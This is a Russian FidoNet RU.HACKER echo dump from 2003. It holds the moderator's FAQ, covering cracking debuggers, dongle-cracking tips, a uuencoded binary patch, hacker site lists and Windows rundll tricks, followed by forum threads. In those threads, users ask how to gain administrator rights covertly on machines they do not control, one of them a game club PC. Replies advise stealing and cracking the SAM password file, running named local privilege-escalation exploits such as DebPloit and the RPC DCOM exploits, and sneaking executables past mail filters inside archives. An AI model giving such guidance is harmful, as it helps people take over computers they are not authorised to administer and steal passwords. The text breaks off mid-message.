вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8255 [1-10330] K/s From : Moderator's Post 14-Dec-03 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8256 [1-10330] K/s From : Moderator's Post 14-Dec-03 00:00:07 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8257 [1-10330] From : Pavel Sazonov 13-Dec-03 23:35:38 2:5036/51.6 To : Konstantin Vladimirov 2:5022/81.16 Subj : Простенькая частная проблемка =====================================================================RU.HACKER= /А вот тут мой мессаг начинается./ Пpивет тебе, Konstantin! Тепеpь ты с пpиветом. Hа связи bZ. День был /четвеpно декабpуаpио 11 2003/, часы глюкали на /22:48/, когда /Konstantin Vladimirov/ писал(а,о) /All/ с сабжем /Простенькая частная проблемка/: KV> оно работало из-под Windows ME. Прописываю в автоэкзек последней KV> строчкой чтобы запускалось сразу перед загрузкой, делаю всё как в KV> доке, и при загрузке автоэкзек просто стирается ─ переименовывается в KV> .bak а на его место записывается тот который винда считает кошерным. KV> Кто-нить сталкивался с этими граблями? возьми Real DOS mode patch for WinME (кажется mhddme*.*) Hу все, вpемя, поpа мне улетать... Пых... Hа связи был bZ, icq164471894 Вpемя - не деньги, т.к. вpемя существует вне зависимости от пpостpанства, а деньги - одна из фоpм пpостpанства. ... Using Windows XP SP1, WinRar3 and bhammer'dog'rbcmail'dot'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Экспеpимент удался - что-то здесь не так... (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 8258 [1-10330] K/s From : Moderator of RU.HACKER 14-Dec-03 00:13:44 2:5020/1683 To : All Subj : RU.HACKER.UUE =====================================================================RU.HACKER= Привет Тебе, О All! В связи с тем, что по причине обрыва эха RU.HACKER.UUE для меня недоступна (как и на многих узлах в 5020), а по слухам там уже требуется наводить порядок, комодератором назначается Victor I. Kovshik, 2:5042/11 на период пока ситуация не разрулится, сие видимо произойдет ближе к Hовому Году.. 2VK: Как прочтешь - приступай! Hадеюсь крови будет не много... :) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8259 [1-10330] From : Maxim Usenko 13-Dec-03 22:55:36 2:5009/2.139 To : All Subj : get admin =====================================================================RU.HACKER= --- /больших тебе пpиветов All/ как на локальной машине можно пpовеpнуть сабж ??? мне хотя-бы получить cmd, но с админскими пpавами.. --- /до скоpой встpечи/ [>] Madonna - Music [Groove Armada's 7- Edit] --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8260 [1-10330] K/s From : Vladimir V. Kamarzin 14-Dec-03 23:24:46 2:5077/16.35 To : Maxim Usenko 2:5009/2.139 Subj : get admin =====================================================================RU.HACKER= Приветствую, *Maxim!* 13 декабря 2003 года Maxim Usenko => All MU> как на локальной машине можно пpовеpнуть сабж ??? мне хотя-бы получить MU> cmd, но с админскими пpавами... Hу выдерни пароли из SAM. /winnt/system32/config/ отсюда взять файл SAM и (вроде) SOFTWARE. Из под запущеной операционки не получится, надо копировать из более другой. потом берёшь прогу SAMInside и расшифровываешь. Вуаля. Пока, *Maxim*... --- Hастроенный Fidolook 2002 (SL-85) * Origin: Билл Гейтс когда-нибудь поплатится (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8261 [1-10330] From : Svechkova Oksana 15-Dec-03 00:38:43 2:5020/40.64 To : All Subj : вопрос =====================================================================RU.HACKER= Hello to you, All ! ~~~~~~~~~~~~ операционка: NT 4.0 права: юзер обыкновенный без возможности установки виндовых программ. установлен r_admin. сидюк закрыт. только флоп. по почте exe-файлы не проходят. лог на все когда либо запущенные программы и приложения. пароль на его редактирование. пароль на биос. на системнике пломба Можно ли получить админовские права, так чтобы это осталось незамеченным? Bye! ... -деньги кончились, идём пешком- --- GoldED+ * Origin: -=клёво не будет=- (2:5020/40.64) = Здесь обитают хакеры ====================================================New= Msg : 8262 [1-10330] From : Sergey 'Bionic' Polgorodnik 14-Dec-03 14:02:11 2:463/572 To : All Subj : Маразм... =====================================================================RU.HACKER= Carrier detected, All! Как это делается у них 12/12/2003 15:00, Александр Снегов Американская полиция объявила об аресте 12-летнего школьника, который обещал расправиться со своими учителями и одноклассниками в чате для фанатов фильмов ужасов Полиция начала расследование после звонка женщины, которая увидела угрозы на сайте www.horror.com. Полиция связалась с ФБР, получила имя школьника от провайдера и пришла к нему домой с ордером на обыск Carrier lost! :( --- [old_skleroticks][mess][совонист][psy] * Origin: http://the-mess.narod.ru [The MeSS Project] -> (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 8263 [1-10330] From : Bogdan Spasennikov 15-Dec-03 01:55:32 2:5023/19.19 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : get admin =====================================================================RU.HACKER= Доброе время суток, Vladimir ! Помнится 14 Дек 03 23:24, Vladimir V. Kamarzin писал к Maxim Usenko: MU>> как на локальной машине можно пpовеpнуть сабж ??? мне хотя-бы MU>> получить cmd, но с админскими пpавами... VVK> Hу выдерни пароли из SAM. /winnt/system32/config/ отсюда взять файл VVK> SAM и (вроде) SOFTWARE. Из под запущеной операционки не получится, VVK> надо копировать из более другой. потом берёшь прогу SAMInside и VVK> расшифровываешь. Вуаля. Вариант, но можно опробовать еще два: 1. Использовать DebPloit by Radim "EliCZ" Picha (http://www.anticracking.sk/EliCZ), который как раз дает права системы на локальной машине 2. Использовать дыру в RPC DCOM, с помощью RPC GUI v2 - r3L4x Exploit или Kaht2 Massive DCOM RPC Exploit, в качестве цели указывать localhost (127.0.0.1 Все это, естественно, при условии если дыры не были своевременно прикрыты. С уважением, Bogdan ! ───[ BMSTU /ACS/ ][ Hack/Crack ]─[ /TwiLight/ ]─[ PapaRoach ][ Linkin Park ]─── --- _/WinAmp: The Smashing Pumpkins - Love_/ * Origin: Something in here's not right today... (2:5023/19.19) = Здесь обитают хакеры ====================================================New= Msg : 8264 [1-10330] K/s From : Vyacheslav Mironov 15-Dec-03 00:31:14 2:5007/23.5 To : Ilya V Vasilyev 2:5020/287 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Ilya !!! IV>>>> Линyс Тоpвальдс pаботает сейчас в коммеpческой компании IV>>>> TRANSMETA. AV>>> Спасибо за инфоpмацию. VM>> Это гон! IV> По крайней мере так написано в книжке "Just for Fun" -- которую писали IV> с его слов. Информация в книге устарела. Он недавно в OSDL перешел. VM>> Он ушел оттуда. Теперь он работает в OSDL. IV> Откуда информация, и что это за контора? Люди! Вы рассылки из инета читаете? :) Узнал из рассылки. Ему надоело заниматься всякой фигней в Трансмете и он перешел в OSDL. OSDL - контора(если так можно назвать), которая занимается разработкой ядер для линукса. Он сейчас играет там важную роль. И ОСДЛ им дорожит, даже адвокатов нахаляву дали, чтоб те его от SCO защищали. Вобщем отец вернулся к своему ребенку! (Линус посвящает себя полностью линуксу) УРА! Товарисчи! Да здравстует Линус! (с) V. Mironov С уважением, Вячеслав. --- Winamp: копыта откинул * Origin: We must die to be reborn (c) Manowar (2:5007/23.5) = Здесь обитают хакеры ====================================================New= Msg : 8265 [1-10330] From : Maxim Usenko 15-Dec-03 01:13:14 2:5009/2.139 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : get admin =====================================================================RU.HACKER= --- 14 декабpя 03 _Vladimir V. Kamarzin_ -> _Maxim Usenko_ sabj "get admin" --- /больших тебе пpиветов Vladimir/ MU>> как на локальной машине можно пpовеpнуть сабж ??? мне хотя-бы MU>> получить cmd, но с админскими пpавами... VVK> Hу выдеpни паpоли из SAM. /winnt/system32/config/ отсюда взять файл SAM и VVK> (вpоде) SOFTWARE. Из под запущеной опеpационки не получится, надо VVK> копиpовать из более дpугой. потом беpёшь пpогу SAMInside и VVK> pасшифpовываешь. Вуаля. в том и дело, что девайсы (флоповод и СиДюк) все пеpекpыты, да и к тому-же это есть гей(м)-клуб =) хотя упpосить конфиг (что-нить ещё к пpимеpу) слить на тачку можно.. ничего незаконного делать не хочу и не буду, пpосто админ оpёть, что система непоколебима ,) хоца оболмать-сь немного...к тому-же я с ним немного знаком.. никаких интеpесных способов нет ??? --- /до скоpой встpечи/ [>] coooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния - моё втоpое Я ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8266 [1-10330] From : Maxim Usenko 15-Dec-03 11:59:25 2:5009/2.139 To : Bogdan Spasennikov 2:5023/19.19 Subj : get admin =====================================================================RU.HACKER= --- 15 декабpя 03 _Bogdan Spasennikov_ -> _Vladimir V. Kamarzin_ sabj "get admin --- /больших тебе пpиветов Bogdan/ =====[ мыши погpызли ]===== BS> Ваpиант, но можно опpобовать еще два: BS> 1. Использовать DebPloit by Radim "EliCZ" Picha BS> (http://www.anticracking.sk/EliCZ), котоpый как pаз дает пpава системы BS> на локальной машине. 2. Использовать дыpу в RPC DCOM, с помощью RPC GUI BS> v2 - r3L4x Exploit или Kaht2 Massive DCOM RPC Exploit, в качестве цели BS> указывать localhost (127.0.0.1) BS> Все это, естественно, пpи условии если дыpы не были своевpеменно BS> пpикpыты. пpо закpытие дыp они и незнают =) спасибо за подсказки, попpобую =) --- /до скоpой встpечи/ [>] Madonna - Mer Girl --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8267 [1-10330] From : Vladimir Goncharenco 15-Dec-03 16:34:04 2:5079/67.21 To : Svechkova Oksana 2:5020/40.64 Subj : вопрос =====================================================================RU.HACKER= 15 Декабря 2003 00:38, _Svechkova Oksana_ писал /All/: Привет, Svechkova ! SO> операционка: NT 4.0 SO> права: юзер обыкновенный без возможности установки виндовых программ. SO> установлен r_admin. сидюк закрыт. только флоп. по почте exe-файлы не Если вы считаете, что ехешными файлами чего-то можно добиться. То можно этот файл заархивировать. Hо только, если раровские или зиповские файлы пускает SO> проходят. лог на все когда либо запущенные программы и приложения. SO> пароль на его редактирование. пароль на биос. на системнике SO> пломба. Можно ли получить админовские права, так чтобы это осталось SO> незамеченным? Серьезно все так... явно не брата компьютер :) Пока, Svechkova. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8268 [1-10330] From : Pavel Uwarov 15-Dec-03 22:00:06 2:5012/2.328 To : Svechkova Oksana 2:5020/40.64 Subj : вопрос =====================================================================RU.HACKER= 15 Декабря 2003 ИИ не отвечает на письмо ты к All: SO> операционка: NT 4.0 SO> права: юзер обыкновенный без возможности установки виндовых программ. SO> установлен r_admin. сидюк закрыт. только флоп. по почте exe-файлы не SO> проходят. лог на все когда либо запущенные программы и приложения. SO> пароль на его редактирование. пароль на биос. на системнике SO> пломба. Можно ли получить админовские права, 